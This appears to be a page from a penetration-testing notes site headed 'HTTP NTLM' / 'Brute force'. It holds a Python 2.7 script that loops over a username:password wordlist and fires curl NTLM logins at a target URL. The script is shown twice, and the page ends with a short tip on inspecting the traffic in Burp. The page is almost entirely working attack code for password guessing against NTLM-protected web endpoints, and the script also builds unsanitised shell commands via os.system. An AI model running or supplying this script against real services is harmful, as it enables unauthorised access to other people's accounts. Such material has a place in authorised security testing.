HTTP NTLM

#!/usr/bin/python2.7
import os
import sys
import time
 
# wordlist contains "username:password" lines
wordlist = open("user_pass2.txt","r").read().splitlines()
 
i=0
url = "https://example.com/ntlmv2"
domain=""                  # without domain, local authentication
#domain = "DOMAIN\\\\"     # with domain - escape doubled for python and shell
 
cmd = "curl -s -o /dev/null -w \"%{http_code}\" --silent -k --ntlm -u "
for line in wordlist:
                username = line.split(":")[0]
                password = line.split(":")[1]
                time.sleep(2)
                os.system(cmd + domain + username + ":" + password + " " + url +";echo ' - "+domain+username+":"+password+"';" )
                i+=1

Brute force

HTTP NTLM

#!/usr/bin/python2.7
import os
import sys
import time
 
# wordlist contains "username:password" lines
wordlist = open("user_pass2.txt","r").read().splitlines()
 
i=0
url = "https://example.com/ntlmv2"
domain=""                  # without domain, local authentication
#domain = "DOMAIN\\\\"     # with domain - escape doubled for python and shell
 
cmd = "curl -s -o /dev/null -w \"%{http_code}\" --silent -k --ntlm -u "
for line in wordlist:
                username = line.split(":")[0]
                password = line.split(":")[1]
                time.sleep(2)
                os.system(cmd + domain + username + ":" + password + " " + url +";echo ' - "+domain+username+":"+password+"';" )
                i+=1

There is a Burp Extension - proxify curl via http_proxy,https_proxy environmental variables within the terminal and confirm you can decode NTLM requests in Burp (Repeater, select extension).

PreviousInsecure Deserialization NextShell Fu - Oneliners

Last updated 3 years ago

Was this helpful?